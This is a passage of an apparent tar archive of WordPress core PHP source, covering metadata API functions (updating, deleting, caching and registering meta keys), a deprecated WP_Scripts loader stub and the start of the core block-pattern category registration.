$meta = get_metadata_by_mid( $meta_type, $meta_id );
if ( $meta ) {
$original_key = $meta->meta_key;
$object_id = $meta->{$column};
/*
* If a new meta_key (last parameter) was specified, change the meta key,
* otherwise use the original key in the update statement.
*/
if ( false === $meta_key ) {
$meta_key = $original_key;
} elseif ( ! is_string( $meta_key ) ) {
return false;
}
$meta_subtype = get_object_subtype( $meta_type, $object_id );
// Sanitize the meta.
$_meta_value = $meta_value;
$meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype );
$meta_value = maybe_serialize( $meta_value );
// Format the data query arguments.
$data = array(
'meta_key' => $meta_key,
'meta_value' => $meta_value,
);
// Format the where query arguments.
$where = array();
$where[ $id_column ] = $meta_id;
/** This action is documented in wp-includes/meta.php */
do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/** This action is documented in wp-includes/meta.php */
do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
// Run the update query, all fields in $data are %s, $where is a %d.
$result = $wpdb->update( $table, $data, $where, '%s', '%d' );
if ( ! $result ) {
return false;
}
// Clear the caches.
wp_cache_delete( $object_id, $meta_type . '_meta' );
/** This action is documented in wp-includes/meta.php */
do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value );
if ( 'post' === $meta_type ) {
/** This action is documented in wp-includes/meta.php */
do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value );
}
return true;
}
// And if the meta was not found.
return false;
}
/**
* Deletes metadata by meta ID.
*
* @since 3.3.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $meta_id ID for a specific meta row.
* @return bool True on successful delete, false on failure.
*/
function delete_metadata_by_mid( $meta_type, $meta_id ) {
global $wpdb;
// Make sure everything is valid.
if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) {
return false;
}
$meta_id = (int) $meta_id;
if ( $meta_id <= 0 ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
// Object and ID columns.
$column = sanitize_key( $meta_type . '_id' );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
/**
* Short-circuits deleting metadata of a specific type by meta ID.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `delete_blog_metadata_by_mid`
* - `delete_post_metadata_by_mid`
* - `delete_comment_metadata_by_mid`
* - `delete_term_metadata_by_mid`
* - `delete_user_metadata_by_mid`
*
* @since 5.0.0
*
* @param null|bool $delete Whether to allow metadata deletion of the given type.
* @param int $meta_id Meta ID.
*/
$check = apply_filters( "delete_{$meta_type}_metadata_by_mid", null, $meta_id );
if ( null !== $check ) {
return (bool) $check;
}
// Fetch the meta and go on if it's found.
$meta = get_metadata_by_mid( $meta_type, $meta_id );
if ( $meta ) {
$object_id = (int) $meta->{$column};
/** This action is documented in wp-includes/meta.php */
do_action( "delete_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value );
// Old-style action.
if ( 'post' === $meta_type || 'comment' === $meta_type ) {
/**
* Fires immediately before deleting post or comment metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta
* object type (post or comment).
*
* Possible hook names include:
*
* - `delete_postmeta`
* - `delete_commentmeta`
*
* @since 3.4.0
*
* @param int $meta_id ID of the metadata entry to delete.
*/
do_action( "delete_{$meta_type}meta", $meta_id );
}
// Run the query, will return true if deleted, false otherwise.
$result = (bool) $wpdb->delete( $table, array( $id_column => $meta_id ) );
// Clear the caches.
wp_cache_delete( $object_id, $meta_type . '_meta' );
/** This action is documented in wp-includes/meta.php */
do_action( "deleted_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value );
// Old-style action.
if ( 'post' === $meta_type || 'comment' === $meta_type ) {
/**
* Fires immediately after deleting post or comment metadata of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta
* object type (post or comment).
*
* Possible hook names include:
*
* - `deleted_postmeta`
* - `deleted_commentmeta`
*
* @since 3.4.0
*
* @param int $meta_id Deleted metadata entry ID.
*/
do_action( "deleted_{$meta_type}meta", $meta_id );
}
return $result;
}
// Meta ID was not found.
return false;
}
/**
* Updates the metadata cache for the specified objects.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string|int[] $object_ids Array or comma delimited list of object IDs to update cache for.
* @return array|false Metadata cache for the specified objects, or false on failure.
*/
function update_meta_cache( $meta_type, $object_ids ) {
global $wpdb;
if ( ! $meta_type || ! $object_ids ) {
return false;
}
$table = _get_meta_table( $meta_type );
if ( ! $table ) {
return false;
}
$column = sanitize_key( $meta_type . '_id' );
if ( ! is_array( $object_ids ) ) {
$object_ids = preg_replace( '|[^0-9,]|', '', $object_ids );
$object_ids = explode( ',', $object_ids );
}
$object_ids = array_map( 'intval', $object_ids );
/**
* Short-circuits updating the metadata cache of a specific type.
*
* The dynamic portion of the hook name, `$meta_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
* Returning a non-null value will effectively short-circuit the function.
*
* Possible hook names include:
*
* - `update_blog_metadata_cache`
* - `update_post_metadata_cache`
* - `update_comment_metadata_cache`
* - `update_term_metadata_cache`
* - `update_user_metadata_cache`
*
* @since 5.0.0
*
* @param mixed $check Whether to allow updating the meta cache of the given type.
* @param int[] $object_ids Array of object IDs to update the meta cache for.
*/
$check = apply_filters( "update_{$meta_type}_metadata_cache", null, $object_ids );
if ( null !== $check ) {
return (bool) $check;
}
$cache_group = $meta_type . '_meta';
$non_cached_ids = array();
$cache = array();
$cache_values = wp_cache_get_multiple( $object_ids, $cache_group );
foreach ( $cache_values as $id => $cached_object ) {
if ( false === $cached_object ) {
$non_cached_ids[] = $id;
} else {
$cache[ $id ] = $cached_object;
}
}
if ( empty( $non_cached_ids ) ) {
return $cache;
}
// Get meta info.
$id_list = implode( ',', $non_cached_ids );
$id_column = ( 'user' === $meta_type ) ? 'umeta_id' : 'meta_id';
$meta_list = $wpdb->get_results( "SELECT $column, meta_key, meta_value FROM $table WHERE $column IN ($id_list) ORDER BY $id_column ASC", ARRAY_A );
if ( ! empty( $meta_list ) ) {
foreach ( $meta_list as $metarow ) {
$mpid = (int) $metarow[ $column ];
$mkey = $metarow['meta_key'];
$mval = $metarow['meta_value'];
// Force subkeys to be array type.
if ( ! isset( $cache[ $mpid ] ) || ! is_array( $cache[ $mpid ] ) ) {
$cache[ $mpid ] = array();
}
if ( ! isset( $cache[ $mpid ][ $mkey ] ) || ! is_array( $cache[ $mpid ][ $mkey ] ) ) {
$cache[ $mpid ][ $mkey ] = array();
}
// Add a value to the current pid/key.
$cache[ $mpid ][ $mkey ][] = $mval;
}
}
$data = array();
foreach ( $non_cached_ids as $id ) {
if ( ! isset( $cache[ $id ] ) ) {
$cache[ $id ] = array();
}
$data[ $id ] = $cache[ $id ];
}
wp_cache_add_multiple( $data, $cache_group );
return $cache;
}
/**
* Retrieves the queue for lazy-loading metadata.
*
* @since 4.5.0
*
* @return WP_Metadata_Lazyloader Metadata lazyloader queue.
*/
function wp_metadata_lazyloader() {
static $wp_metadata_lazyloader;
if ( null === $wp_metadata_lazyloader ) {
$wp_metadata_lazyloader = new WP_Metadata_Lazyloader();
}
return $wp_metadata_lazyloader;
}
/**
* Given a meta query, generates SQL clauses to be appended to a main query.
*
* @since 3.2.0
*
* @see WP_Meta_Query
*
* @param array $meta_query A meta query.
* @param string $type Type of meta.
* @param string $primary_table Primary database table name.
* @param string $primary_id_column Primary ID column name.
* @param object $context Optional. The main query object. Default null.
* @return string[]|false {
* Array containing JOIN and WHERE SQL clauses to append to the main query,
* or false if no table exists for the requested meta type.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
function get_meta_sql( $meta_query, $type, $primary_table, $primary_id_column, $context = null ) {
$meta_query_obj = new WP_Meta_Query( $meta_query );
return $meta_query_obj->get_sql( $type, $primary_table, $primary_id_column, $context );
}
/**
* Retrieves the name of the metadata table for the specified object type.
*
* @since 2.9.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @return string|false Metadata table name, or false if no metadata table exists
*/
function _get_meta_table( $type ) {
global $wpdb;
$table_name = $type . 'meta';
if ( empty( $wpdb->$table_name ) ) {
return false;
}
return $wpdb->$table_name;
}
/**
* Determines whether a meta key is considered protected.
*
* @since 3.1.3
*
* @param string $meta_key Metadata key.
* @param string $meta_type Optional. Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table. Default empty string.
* @return bool Whether the meta key is considered protected.
*/
function is_protected_meta( $meta_key, $meta_type = '' ) {
$sanitized_key = preg_replace( "/[^\x20-\x7E\p{L}]/", '', $meta_key );
$protected = strlen( $sanitized_key ) > 0 && ( '_' === $sanitized_key[0] );
/**
* Filters whether a meta key is considered protected.
*
* @since 3.2.0
*
* @param bool $protected Whether the key is considered protected.
* @param string $meta_key Metadata key.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
return apply_filters( 'is_protected_meta', $protected, $meta_key, $meta_type );
}
/**
* Sanitizes meta value.
*
* @since 3.1.3
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $meta_key Metadata key.
* @param mixed $meta_value Metadata value to sanitize.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return mixed Sanitized $meta_value.
*/
function sanitize_meta( $meta_key, $meta_value, $object_type, $object_subtype = '' ) {
if ( ! empty( $object_subtype ) && has_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}" ) ) {
/**
* Filters the sanitization of a specific meta key of a specific meta type and subtype.
*
* The dynamic portions of the hook name, `$object_type`, `$meta_key`,
* and `$object_subtype`, refer to the metadata object type (blog, comment, post, term, or user),
* the meta key value, and the object subtype respectively.
*
* @since 4.9.8
*
* @param mixed $meta_value Metadata value to sanitize.
* @param string $meta_key Metadata key.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Object subtype.
*/
return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $meta_value, $meta_key, $object_type, $object_subtype );
}
/**
* Filters the sanitization of a specific meta key of a specific meta type.
*
* The dynamic portions of the hook name, `$meta_type`, and `$meta_key`,
* refer to the metadata object type (blog, comment, post, term, or user) and the meta
* key value, respectively.
*
* @since 3.3.0
*
* @param mixed $meta_value Metadata value to sanitize.
* @param string $meta_key Metadata key.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
*/
return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}", $meta_value, $meta_key, $object_type );
}
/**
* Registers a meta key.
*
* It is recommended to register meta keys for a specific combination of object type and object subtype. If passing
* an object subtype is omitted, the meta key will be registered for the entire object type, however it can be partly
* overridden in case a more specific meta key of the same name exists for the same object type and a subtype.
*
* If an object type does not support any subtypes, such as blogs, users, or comments, you should commonly call this function
* without passing a subtype.
*
* @since 3.3.0
* @since 4.6.0 {@link https://core.trac.wordpress.org/ticket/35658 Modified
* to support an array of data to attach to registered meta keys}. Previous arguments for
* `$sanitize_callback` and `$auth_callback` have been folded into this array.
* @since 4.9.8 The `$object_subtype` argument was added to the arguments array.
* @since 5.3.0 Valid meta types expanded to include "array" and "object".
* @since 5.5.0 The `$default` argument was added to the arguments array.
* @since 6.4.0 The `$revisions_enabled` argument was added to the arguments array.
* @since 6.7.0 The `label` argument was added to the arguments array.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Meta key to register.
* @param array $args {
* Data used to describe the meta key when registered.
*
* @type string $object_subtype A subtype; e.g. if the object type is "post", the post type. If left empty,
* the meta key will be registered on the entire object type. Default empty.
* @type string $type The type of data associated with this meta key.
* Valid values are 'string', 'boolean', 'integer', 'number', 'array', and 'object'.
* @type string $label A human-readable label of the data attached to this meta key.
* @type string $description A description of the data attached to this meta key.
* @type bool $single Whether the meta key has one value per object, or an array of values per object.
* @type mixed $default The default value returned from get_metadata() if no value has been set yet.
* When using a non-single meta key, the default value is for the first entry.
* In other words, when calling get_metadata() with `$single` set to `false`,
* the default value given here will be wrapped in an array.
* @type callable $sanitize_callback A function or method to call when sanitizing `$meta_key` data.
* @type callable $auth_callback Optional. A function or method to call when performing edit_post_meta,
* add_post_meta, and delete_post_meta capability checks.
* @type bool|array $show_in_rest Whether data associated with this meta key can be considered public and
* should be accessible via the REST API. A custom post type must also declare
* support for custom fields for registered meta to be accessible via REST.
* When registering complex meta values this argument may optionally be an
* array with 'schema' or 'prepare_callback' keys instead of a boolean.
* @type bool $revisions_enabled Whether to enable revisions support for this meta_key. Can only be used when the
* object type is 'post'.
* }
* @param string|array $deprecated Deprecated. Use `$args` instead.
* @return bool True if the meta key was successfully registered in the global array, false if not.
* Registering a meta key with distinct sanitize and auth callbacks will fire those callbacks,
* but will not add to the global registry.
*/
function register_meta( $object_type, $meta_key, $args, $deprecated = null ) {
global $wp_meta_keys;
if ( ! is_array( $wp_meta_keys ) ) {
$wp_meta_keys = array();
}
$defaults = array(
'object_subtype' => '',
'type' => 'string',
'label' => '',
'description' => '',
'default' => '',
'single' => false,
'sanitize_callback' => null,
'auth_callback' => null,
'show_in_rest' => false,
'revisions_enabled' => false,
);
// There used to be individual args for sanitize and auth callbacks.
$has_old_sanitize_cb = false;
$has_old_auth_cb = false;
if ( is_callable( $args ) ) {
$args = array(
'sanitize_callback' => $args,
);
$has_old_sanitize_cb = true;
} else {
$args = (array) $args;
}
if ( is_callable( $deprecated ) ) {
$args['auth_callback'] = $deprecated;
$has_old_auth_cb = true;
}
/**
* Filters the registration arguments when registering meta.
*
* @since 4.6.0
*
* @param array $args Array of meta registration arguments.
* @param array $defaults Array of default arguments.
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Meta key.
*/
$args = apply_filters( 'register_meta_args', $args, $defaults, $object_type, $meta_key );
unset( $defaults['default'] );
$args = wp_parse_args( $args, $defaults );
// Require an item schema when registering array meta.
if ( false !== $args['show_in_rest'] && 'array' === $args['type'] ) {
if ( ! is_array( $args['show_in_rest'] ) || ! isset( $args['show_in_rest']['schema']['items'] ) ) {
_doing_it_wrong( __FUNCTION__, __( 'When registering an "array" meta type to show in the REST API, you must specify the schema for each array item in "show_in_rest.schema.items".' ), '5.3.0' );
return false;
}
}
$object_subtype = ! empty( $args['object_subtype'] ) ? $args['object_subtype'] : '';
if ( $args['revisions_enabled'] ) {
if ( 'post' !== $object_type ) {
_doing_it_wrong( __FUNCTION__, __( 'Meta keys cannot enable revisions support unless the object type supports revisions.' ), '6.4.0' );
return false;
} elseif ( ! empty( $object_subtype ) && ! post_type_supports( $object_subtype, 'revisions' ) ) {
_doing_it_wrong( __FUNCTION__, __( 'Meta keys cannot enable revisions support unless the object subtype supports revisions.' ), '6.4.0' );
return false;
}
}
// If `auth_callback` is not provided, fall back to `is_protected_meta()`.
if ( empty( $args['auth_callback'] ) ) {
if ( is_protected_meta( $meta_key, $object_type ) ) {
$args['auth_callback'] = '__return_false';
} else {
$args['auth_callback'] = '__return_true';
}
}
// Back-compat: old sanitize and auth callbacks are applied to all of an object type.
if ( is_callable( $args['sanitize_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
add_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'], 10, 4 );
} else {
add_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'], 10, 3 );
}
}
if ( is_callable( $args['auth_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
add_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'], 10, 6 );
} else {
add_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'], 10, 6 );
}
}
if ( array_key_exists( 'default', $args ) ) {
$schema = $args;
if ( is_array( $args['show_in_rest'] ) && isset( $args['show_in_rest']['schema'] ) ) {
$schema = array_merge( $schema, $args['show_in_rest']['schema'] );
}
$check = rest_validate_value_from_schema( $args['default'], $schema );
if ( is_wp_error( $check ) ) {
_doing_it_wrong( __FUNCTION__, __( 'When registering a default meta value the data must match the type provided.' ), '5.5.0' );
return false;
}
if ( ! has_filter( "default_{$object_type}_metadata", 'filter_default_metadata' ) ) {
add_filter( "default_{$object_type}_metadata", 'filter_default_metadata', 10, 5 );
}
}
// Global registry only contains meta keys registered with the array of arguments added in 4.6.0.
if ( ! $has_old_auth_cb && ! $has_old_sanitize_cb ) {
unset( $args['object_subtype'] );
$wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] = $args;
return true;
}
return false;
}
/**
* Filters into default_{$object_type}_metadata and adds in default value.
*
* @since 5.5.0
*
* @param mixed $value Current value passed to filter.
* @param int $object_id ID of the object metadata is for.
* @param string $meta_key Metadata key.
* @param bool $single If true, return only the first value of the specified `$meta_key`.
* This parameter has no effect if `$meta_key` is not specified.
* @param string $meta_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @return mixed An array of default values if `$single` is false.
* The default value of the meta field if `$single` is true.
*/
function filter_default_metadata( $value, $object_id, $meta_key, $single, $meta_type ) {
global $wp_meta_keys;
if ( wp_installing() ) {
return $value;
}
if ( ! is_array( $wp_meta_keys ) || ! isset( $wp_meta_keys[ $meta_type ] ) ) {
return $value;
}
$defaults = array();
foreach ( $wp_meta_keys[ $meta_type ] as $sub_type => $meta_data ) {
foreach ( $meta_data as $_meta_key => $args ) {
if ( $_meta_key === $meta_key && array_key_exists( 'default', $args ) ) {
$defaults[ $sub_type ] = $args;
}
}
}
if ( ! $defaults ) {
return $value;
}
// If this meta type does not have subtypes, then the default is keyed as an empty string.
if ( isset( $defaults[''] ) ) {
$metadata = $defaults[''];
} else {
$sub_type = get_object_subtype( $meta_type, $object_id );
if ( ! isset( $defaults[ $sub_type ] ) ) {
return $value;
}
$metadata = $defaults[ $sub_type ];
}
if ( $single ) {
$value = $metadata['default'];
} else {
$value = array( $metadata['default'] );
}
return $value;
}
/**
* Checks if a meta key is registered.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Metadata key.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return bool True if the meta key is registered to the object type and, if provided,
* the object subtype. False if not.
*/
function registered_meta_key_exists( $object_type, $meta_key, $object_subtype = '' ) {
$meta_keys = get_registered_meta_keys( $object_type, $object_subtype );
return isset( $meta_keys[ $meta_key ] );
}
/**
* Unregisters a meta key from the list of registered keys.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $meta_key Metadata key.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return bool True if successful. False if the meta key was not registered.
*/
function unregister_meta_key( $object_type, $meta_key, $object_subtype = '' ) {
global $wp_meta_keys;
if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
return false;
}
$args = $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ];
if ( isset( $args['sanitize_callback'] ) && is_callable( $args['sanitize_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
remove_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'] );
} else {
remove_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'] );
}
}
if ( isset( $args['auth_callback'] ) && is_callable( $args['auth_callback'] ) ) {
if ( ! empty( $object_subtype ) ) {
remove_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'] );
} else {
remove_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'] );
}
}
unset( $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] );
// Do some clean up.
if ( empty( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) {
unset( $wp_meta_keys[ $object_type ][ $object_subtype ] );
}
if ( empty( $wp_meta_keys[ $object_type ] ) ) {
unset( $wp_meta_keys[ $object_type ] );
}
return true;
}
/**
* Retrieves a list of registered metadata args for an object type, keyed by their meta keys.
*
* @since 4.6.0
* @since 4.9.8 The `$object_subtype` parameter was added.
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param string $object_subtype Optional. The subtype of the object type. Default empty string.
* @return array[] List of registered metadata args, keyed by their meta keys.
*/
function get_registered_meta_keys( $object_type, $object_subtype = '' ) {
global $wp_meta_keys;
if ( ! is_array( $wp_meta_keys ) || ! isset( $wp_meta_keys[ $object_type ] ) || ! isset( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) {
return array();
}
return $wp_meta_keys[ $object_type ][ $object_subtype ];
}
/**
* Retrieves registered metadata for a specified object.
*
* The results include both meta that is registered specifically for the
* object's subtype and meta that is registered for the entire object type.
*
* @since 4.6.0
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object the metadata is for.
* @param string $meta_key Optional. Registered metadata key. If not specified, retrieve all registered
* metadata for the specified object.
* @return mixed A single value or array of values for a key if specified. An array of all registered keys
* and values for an object ID if not. False if a given $meta_key is not registered.
*/
function get_registered_metadata( $object_type, $object_id, $meta_key = '' ) {
$object_subtype = get_object_subtype( $object_type, $object_id );
if ( ! empty( $meta_key ) ) {
if ( ! empty( $object_subtype ) && ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
$object_subtype = '';
}
if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) {
return false;
}
$meta_keys = get_registered_meta_keys( $object_type, $object_subtype );
$meta_key_data = $meta_keys[ $meta_key ];
$data = get_metadata( $object_type, $object_id, $meta_key, $meta_key_data['single'] );
return $data;
}
$data = get_metadata( $object_type, $object_id );
if ( ! $data ) {
return array();
}
$meta_keys = get_registered_meta_keys( $object_type );
if ( ! empty( $object_subtype ) ) {
$meta_keys = array_merge( $meta_keys, get_registered_meta_keys( $object_type, $object_subtype ) );
}
return array_intersect_key( $data, $meta_keys );
}
/**
* Filters out `register_meta()` args based on an allowed list.
*
* `register_meta()` args may change over time, so requiring the allowed list
* to be explicitly turned off is a warranty seal of sorts.
*
* @access private
* @since 5.5.0
*
* @param array $args Arguments from `register_meta()`.
* @param array $default_args Default arguments for `register_meta()`.
* @return array Filtered arguments.
*/
function _wp_register_meta_args_allowed_list( $args, $default_args ) {
return array_intersect_key( $args, $default_args );
}
/**
* Returns the object subtype for a given object ID of a specific type.
*
* @since 4.9.8
*
* @param string $object_type Type of object metadata is for. Accepts 'blog', 'post', 'comment', 'term',
* 'user', or any other object type with an associated meta table.
* @param int $object_id ID of the object to retrieve its subtype.
* @return string The object subtype or an empty string if unspecified subtype.
*/
function get_object_subtype( $object_type, $object_id ) {
$object_id = (int) $object_id;
$object_subtype = '';
switch ( $object_type ) {
case 'post':
$post_type = get_post_type( $object_id );
if ( ! empty( $post_type ) ) {
$object_subtype = $post_type;
}
break;
case 'term':
$term = get_term( $object_id );
if ( ! $term instanceof WP_Term ) {
break;
}
$object_subtype = $term->taxonomy;
break;
case 'comment':
$comment = get_comment( $object_id );
if ( ! $comment ) {
break;
}
$object_subtype = 'comment';
break;
case 'user':
$user = get_user_by( 'id', $object_id );
if ( ! $user ) {
break;
}
$object_subtype = 'user';
break;
}
/**
* Filters the object subtype identifier.
*
* The dynamic portion of the hook name, `$object_type`, refers to the meta object type
* (blog, post, comment, term, user, or any other type with an associated meta table).
*
* Possible hook names include:
*
* - `get_object_subtype_blog`
* - `get_object_subtype_post`
* - `get_object_subtype_comment`
* - `get_object_subtype_term`
* - `get_object_subtype_user`
*
* @since 4.9.8
*
* @param string $object_subtype Object subtype or empty string to override.
* @param int $object_id ID of the object to get the subtype for.
*/
return apply_filters( "get_object_subtype_{$object_type}", $object_subtype, $object_id );
}
class.wp-scripts-20260605042536.php 0000666 00000000527 15224151220 0012064 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
block-patterns-20260621094000.php 0000666 00000031635 15224151220 0011570 0 ustar 00 <?php
/**
* Register the block patterns and block patterns categories
*
* @package WordPress
* @since 5.5.0
*/
add_theme_support( 'core-block-patterns' );
/**
* Registers the core block patterns and categories.
*
* @since 5.5.0
* @since 6.3.0 Added source to core block patterns.
* @access private
*/
function _register_core_block_patterns_and_categories() {
$should_register_core_patterns = get_theme_support( 'core-block-patterns' );
if ( $should_register_core_patterns ) {
$core_block_patterns = array(
'query-standard-posts',
'query-medium-posts',
'query-small-posts',
'query-grid-posts',
'query-large-title-posts',
'query-offset-posts',
);
foreach ( $core_block_patterns as $core_block_pattern ) {
$pattern = require __DIR__ . '/block-patterns/' . $core_block_pattern . '.php';
$pattern['source'] = 'core';
register_block_pattern( 'core/' . $core_block_pattern, $pattern );
}
}
register_block_pattern_category(
'banner',
array(
'label' => _x( 'Banners', 'Block pattern category' ),
'description' => __( 'Bold sections designed to showcase key content.' ),
)
);
register_block_pattern_category(
'buttons',
array(
'label' => _x( 'Buttons', 'Block pattern category' ),
'description' => __( 'Patterns that contain buttons and call to actions.' ),
)
);
register_block_pattern_category(
'columns',
array(
'label' => _x( 'Columns', 'Block pattern category' ),
'description' => __( 'Multi-column patterns with more complex layouts.' ),
)
);
register_block_pattern_category(
'text',
array(
'label' => _x( 'Text', 'Block pattern category' ),
'description' => __( 'Patterns containing mostly text.' ),
)
);
register_block_pattern_category(
'query',
array(
'label' => _x( 'Posts', 'Block pattern category' ),
'description' => __( 'Display your latest posts in lists, grids or other layouts.' ),
)
);
register_block_pattern_category(
'featured',
array(
'label' => _x( 'Featured', 'Block pattern category' ),
'description' => __( 'A set of high quality curated patterns.' ),
)
);
register_block_pattern_category(
'call-to-action',
array(
'label' => _x( 'Call to action', 'Block pattern category' ),
'description' => __( 'Sections whose purpose is to trigger a specific action.' ),
)
);
register_block_pattern_category(
'team',
array(
'label' => _x( 'Team', 'Block pattern category' ),
'description' => __( 'A variety of designs to display your team members.' ),
)
);
register_block_pattern_category(
'testimonials',
array(
'label' => _x( 'Testimonials', 'Block pattern category' ),
'description' => __( 'Share reviews and feedback about your brand/business.' ),
)
);
register_block_pattern_category(
'services',
array(
'label' => _x( 'Services', 'Block pattern category' ),
'description' => __( 'Briefly describe what your business does and how you can help.' ),
)
);
register_block_pattern_category(
'contact',
array(
'label' => _x( 'Contact', 'Block pattern category' ),
'description' => __( 'Display your contact information.' ),
)
);
register_block_pattern_category(
'about',
array(
'label' => _x( 'About', 'Block pattern category' ),
'description' => __( 'Introduce yourself.' ),
)
);
register_block_pattern_category(
'portfolio',
array(
'label' => _x( 'Portfolio', 'Block pattern category' ),
'description' => __( 'Showcase your latest work.' ),
)
);
register_block_pattern_category(
'gallery',
array(
'label' => _x( 'Gallery', 'Block pattern category' ),
'description' => __( 'Different layouts for displaying images.' ),
)
);
register_block_pattern_category(
'media',
array(
'label' => _x( 'Media', 'Block pattern category' ),
'description' => __( 'Different layouts containing video or audio.' ),
)
);
register_block_pattern_category(
'videos',
array(
'label' => _x( 'Videos', 'Block pattern category' ),
'description' => __( 'Different layouts containing videos.' ),
)
);
register_block_pattern_category(
'audio',
array(
'label' => _x( 'Audio', 'Block pattern category' ),
'description' => __( 'Different layouts containing audio.' ),
)
);
register_block_pattern_category(
'posts',
array(
'label' => _x( 'Posts', 'Block pattern category' ),
'description' => __( 'Display your latest posts in lists, grids or other layouts.' ),
)
);
register_block_pattern_category(
'footer',
array(
'label' => _x( 'Footers', 'Block pattern category' ),
'description' => __( 'A variety of footer designs displaying information and site navigation.' ),
)
);
register_block_pattern_category(
'header',
array(
'label' => _x( 'Headers', 'Block pattern category' ),
'description' => __( 'A variety of header designs displaying your site title and navigation.' ),
)
);
}
/**
* Normalize the pattern properties to camelCase.
*
* The API's format is snake_case, `register_block_pattern()` expects camelCase.
*
* @since 6.2.0
* @access private
*
* @param array $pattern Pattern as returned from the Pattern Directory API.
* @return array Normalized pattern.
*/
function wp_normalize_remote_block_pattern( $pattern ) {
if ( isset( $pattern['block_types'] ) ) {
$pattern['blockTypes'] = $pattern['block_types'];
unset( $pattern['block_types'] );
}
